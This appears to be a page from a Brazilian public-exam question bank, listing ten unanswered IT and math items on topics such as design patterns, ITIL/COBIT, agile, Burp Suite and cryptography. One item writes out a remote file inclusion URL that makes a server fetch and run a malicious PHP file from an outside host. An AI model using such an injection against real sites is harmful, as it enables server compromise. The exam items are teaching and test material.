Foram encontradas 80 questões.
Considere um dado cúbico, com as faces numeradas de 1 a 6, e que cada face tem a mesma probabilidade de ficar voltada para cima quando o dado é lançado. Davi e Golias lançam esse dado uma vez cada um.
Sabendo que o número obtido no lançamento de Golias é um número par, a probabilidade de que Davi obtenha um número maior do que o de Golias é igual a
Provas
- Engenharia de SoftwareDesign Patterns
- LinguagensJava
- Paradigmas de ProgramaçãoOrientação a ObjetosAnálise e Projeto Orientado a Objetos
Um bom desenvolvedor de sistemas deve ter conhecimento sobre refatoração, padrões de arquitetura e de projeto, princípios SOLID e outros tópicos importantes sobre programação.
Em relação a padrões de projeto, considere o seguinte trecho de código:
public interface Heroi {
void falar();
}
public class HomemDeFerro implements Heroi {
public void falar() {
System.out.println("Eu sou o Homem de Ferro, da Marvel!");
}
}
public class SuperHomem implements Heroi {
public void falar() {
System.out.println("Eu sou o Super Homem, da DC!");
}
}
public class MarvelOuDC {
public static Heroi getHeroi(String nome) {
if (nome.equalsIgnoreCase("HomemDeFerro")) {
return new HomemDeFerro();
} else if (nome.equalsIgnoreCase("SuperHomem"))
{
return new SuperHomem();
}
}
}
Marque a opção que corresponde ao padrão de projeto implementado no código acima.
Provas
As grandezas \( X \), \( A \) e \( B \) são tais que \( X \) é diretamente proporcional a \( A \) e inversamente proporcional a \( B \).
Sabe-se que quando \( A \) = 12 e \( B \) = 30 tem-se \( X \) = 240.
Quando \( A \) = 15 e \( B \) = 36 o valor de \( X \) será
Provas
Os princípios de governança de TI envolvem a definição de processos e estruturas para garantir que a tecnologia da informação seja usada de forma eficiente, alinhada aos objetivos de negócios e à gestão adequada de riscos.
Com relação ao assunto analise as afirmativas a seguir:
I. O COBIT é um framework de governança de TI que foca no alinhamento de TI com os objetivos de negócios, garantindo a entrega de valor e a mitigação de riscos.
II. O ITIL é uma metodologia que descreve práticas de gerenciamento de serviços de TI, com ênfase na entrega eficiente e eficaz de serviços ao cliente, sem considerar a gestão de riscos.
III. O COBIT e o ITIL são frameworks complementares, ambos focados na governança de TI, sendo o COBIT mais voltado para o controle e o ITIL, para a gestão de serviços.
Está correto o que se afirma em
Provas
No contexto da gestão de serviços de TI, analise as afirmativas a seguir.
I. Em ambientes que seguem frameworks como ITIL, práticas de compliance devem ser tratadas separadamente dos processos de gerenciamento de serviços, para evitar atrasos nas auditorias internas e externas.
II. Auditorias de TI devem ser realizadas exclusivamente para verificar a conformidade com normas e regulamentações, sem impacto direto na melhoria dos processos de gerenciamento de incidentes e mudanças.
III. A realização de auditorias sistemáticas pode reduzir falhas de conformidade ao identificar e monitorar indicadores críticos em tempo real, permitindo ações corretivas alinhadas a padrões regulatórios.
Está correto o que se afirma em
Provas
As metodologias ágeis promovem flexibilidade, colaboração e entrega incremental, adaptando-se rapidamente às mudanças em diversos tipos de trabalho. Elas utilizam práticas para organizar tarefas, visualizar o fluxo de trabalho e garantir qualidade contínua.
Nesse sentido, correlacione as metodologias ágeis apresentadas a seguir com suas respectivas descrições.
1. Scrum
2. Kanban
3. XP(Extreme Programming)
( ) Método focado na gestão do fluxo contínuo de trabalho, utilizando um quadro visual para representar as etapas do trabalho, promovendo a visualização das tarefas em diferentes estágios e a limitação do trabalho em andamento.
( ) Metodologia que enfatiza a excelência técnica através da adoção de práticas específicas que visam a alta qualidade do processo de trabalho e do produto final, como revisões frequentes, feedback constante e foco na melhoria contínua do processo.
( ) Framework que define papéis e eventos específicos para a gestão do trabalho em equipe, estruturado em iterações curtas (sprints) com objetivos definidos, buscando entregas incrementais de valor e a adaptação contínua ao contexto, com foco na gestão do projeto como um todo.
Assinale a opção que indica a relação correta, na ordem apresentada.
Provas
- Gestão de ProjetosMonitoramento e Controle de Projetos
- Gestão de ProjetosPMBOKPMBOK: Plano de Gerenciamento do Projeto
- Governança de TIPlanejamento EstratégicoAlinhamento Estratégico entre TI e Negócios
No planejamento e ao controle de projetos, uma prática avançada para garantir o alinhamento entre a execução do projeto e os objetivos estratégicos da organização é
Provas
O Burp Suite é uma ferramenta amplamente utilizada para testes de segurança em aplicações web, oferecendo funcionalidades como interceptação de tráfego, análise de vulnerabilidades e automação de ataques.
Em relação às ferramentas presentes na ferramenta Burp Suite, analise as afirmativas a seguir.
I. O proxy do Burp Suite pode interceptar o tráfego HTTP e HTTPS entre o cliente e o servidor, permitindo analisar e manipular requisições em tempo real; ele é essencial para identificar vulnerabilidades em parâmetros, cabeçalhos e cookies.
II. O Repeater é uma ferramenta do Burp Suite para realizar ataques automatizados, como brute force e fuzzing, permitindo testar vulnerabilidades em parâmetros de entrada.
III. O Intruder é usado para enviar requisições manualmente, permitindo ajustar parâmetros e repetir testes de vulnerabilidades com base em respostas anteriores; sua interface exibe claramente a requisição enviada e a resposta recebida, facilitando a análise e a validação de falhas.
Está correto o que se afirma em
Provas
A página web da sociedade empresária Exemplo1234, disponível na internet, permite que internautas acessem o edital de uma vaga de trabalho por meio do endereço eletrônico http://empresa1234.com/vaga.php?file=vaga.pdf.
Durante a verificação de vulnerabilidades contratada por essa empresa, foi observado que o servidor da página web da Empresa1234 processava o valor fornecido no parâmetro file sem realizar validação ou sanitização adequada.
Como resultado, foi possível incluir e executar no servidor o conteúdo de um arquivo malicioso hospedado no endereço http://testevulnerabilidade.com/badpage.php
O teste foi realizado utilizando o seguinte endereço:
http://empresa1234.com/vaga.php?file=http://testevulnerabilida de.com/badpage.php
Ao acessar essa URL, o conteúdo do arquivo badpage.php foi carregado e executado diretamente pelo servidor da Empresa1234, comprometendo sua segurança.
O tipo de vulnerabilidade presente no servidor de página da Empresa1234 é o
Provas
Durante uma auditoria no setor de TI de TCE-RR, foi constatado que os analistas estavam utilizando criptografia por chave pública para o envio de informações confidenciais. Para garantir que os dados sejam protegidos contra acessos não autorizados, cada servidor precisa configurar corretamente as chaves de criptografia antes de iniciar a troca de mensagens.
Com base no funcionamento da criptografia assimétrica, sobre o processo de envio de uma mensagem criptografada é correto afirmar que
Provas
Caderno Container